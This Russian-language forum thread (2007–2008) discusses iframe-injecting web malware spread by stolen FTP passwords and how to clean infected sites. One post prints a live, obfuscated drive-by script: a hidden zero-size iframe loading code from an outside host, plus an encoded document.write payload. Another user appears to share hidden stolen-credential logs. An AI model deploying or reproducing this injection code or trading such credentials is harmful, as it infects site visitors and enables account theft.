Web-вирусы. iframe

Nektov · 17 Дек 2007

Для просмотра ссылки Войди или Зарегистрируйся
Ага, а под оперу ни одного

Jeurey · 17 Дек 2007

Юзайте Линукс и проблем станет знаааааачительно меньше

dazed · 13 Янв 2008

это все проделки вируса LdPinch! причем хорошо шифруеться и не всегда видин антивирусами. особенно в этом деле плохо показал себя nod32..
Вирус ворует из многих известных фтп клиентов пароли и потом в атоматическом режиме добавляет на ваши страницы зловредный код с фреймом.
Лучше всего не сохраняйте пароли на автомате! хотя бы банальное сохранение в txt файл и то больше гарантий даст чем сохранение в фтп..

mavl · 17 Янв 2008

сорри, если не в тему...
тоже обнаружил на своих сайтах инородный код. 3 сайта - joomla - туча индексных файлов. Хостер (свеб) не парится - говорит, удаляй в ручную.
Качал файлы к себе на комп, думал дримвиром отредактировать, но тут антивирус (nod) перехватывает - и сам не лечит, и мне не даёт редактировать.
Может есть какой скрипт, что бы на автомате на серваке с файлов удалить код ?

dazed · 20 Янв 2008

Чтобы автоматом исправил текст на серверах нужно написать скрипт который находит и меняет в файлах определенный текст (HTML код вируса) на другой текст (к примеру на пробел), попробуй поискать подобные скрипты либо же напиши их сам.

То что NOD орет на файл это понятно, хотя нечего страшного еслы в текстовом редакторе откроете не будет.
Советую:
1. Закачайте файлы на комп.
2. Выйдите из и-нета (для большей надежности)
3. Выключите NOD (чтобы не мешал удалять вирус).
4. Открывайте зараженные файлы notepad' ом и удалите строки вируса, обычно они находяться в самом внизу, там должно быть что типа <iframe=ссылка > удалите подозрительную запись и можете заливать файл обратно на хостинг.

lift · 20 Янв 2008

[RESPECT=1]

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

[/RESPECT]

Jeurey · 21 Янв 2008

lift, злой ты )))))
Бедное блондинко из красногорска

lift · 21 Янв 2008

Jeurey
Выбрал отчет чисто методом тыка пальцам

про блодинку сам смеялся ибо отчет ноябрьский а все пасы рабочие

bbs · 22 Янв 2008

<script>if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000) ;document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write(unescape('%3c%69% 66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f %2f%75%70%64%61%74%65%7a%2e%69%6e%66%6f%2f%65%74%6 3%2f%74%64%73%2e%70%68%70%22%20%77%69%64%74%68%3d% 30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62 %6f%72%64%65%72%3d%30%20%6f%6e%4c%6f%61%64%3d%22%7 3%74%61%74%75%73%3d%64%65%66%61%75%6c%74%53%74%61% 74%75%73%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e'));}</script><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74& 86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f &78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&4 1&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d& 42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3d&42&42&49 &3d&4:&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&4 7&3d&42&42&45&3d&47&42&3d&44&45&3d&44&4:&3d&44&43& 3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d &42&41&45&3d&42&42&47&3d&47&42&3d&44&4:&3d&45&4:&3 d&44&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43& 42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&4:&3d&42 &42&49&3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&4 9&3d&42&41&46&3d&42&41&49&3d&42&41&46&3d&42&42&47& 3d&42&43&42&3d&46&49&3d&44&43&3d&42&41&45&3d&42&41 &46&3d&42&41&41&3d&42&41&41&3d&42&41&42&3d&42&42&4 1&3d&46&4:&3d&44&4:&3d&47&43&3d&47&41&3d&45&48&3d& 42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41 &4:&3d&42&41&42&3d&47&43&3d&44&43&3d&44&43&3d&47&4 1&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d& 42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42 &45&3d&4:&4:&3d&47&42&3d&44&4:&3d&42&41&45&3d&42&4 2&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d& 45&48&3d&42&42&46&3d&42&42&42&3d&4:&4:&3d&42&41&48 &3d&42&42&46&3d&46&43&3d&45&46&3d&46&44&3d&45&47&3 d&4:&49&3d&42&41&46&3d&42&43&43&3d&45&48&3d&42&41& 46&3d&42&42&41&3d&42&41&41&3d&42&41&42&3d&42&43&41 &3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&4 4&4:&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41& 3d&42&42&47&3d&42&41&45&3d&47&42&3d&44&4:&3d&45&4: &3d&44&45&3d&42&44&3d&42&41&3d&42&41&41&3d&42&42&4 2&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&42&3d& 42&42&41&3d&42&42&47&3d&45&47&3d&42&42&4:&3d&42&42 &45&3d&42&41&46&3d&42&42&47&3d&42&41&42&3d&45&41&3 d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42& 46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d &42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&4 5&41&3d&46&44&3d&46&41&3d&45&45&3d&45&4:&3d&45&49& 3d&46&44&3d&45&42&3d&45&45&3d&49&44&3d&42&42&47&3d &42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&4 9&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46& 3d&42&42&41&3d&42&41&44&3d&45&41&3d&45&49&3d&45&45 &3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43&3d&4 7&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d& 42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c &4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>

подскажите начинающему как это можно дешифровать в удобочитаемые комманды?
Спасибо.

lift · 22 Янв 2008

bbs
Как тебе на такой вопрос ответить? Это все кодиться начиная от обычного base64 и аканчивая приватными крипторами. Тут можно гадать долго. Только смысла нет всеравно. Зачем тебе знать чистый код инфрейма если результат и так понятен: подгруз на твой комп файла.

Web-вирусы. iframe

Nektov

Гуру форума

Jeurey

Хранитель порядка

dazed

Гуру форума

mavl

Постоялец

dazed

Гуру форума

lift

Читатель

Jeurey

Хранитель порядка

lift

Читатель

bbs

Прохожие

lift

Читатель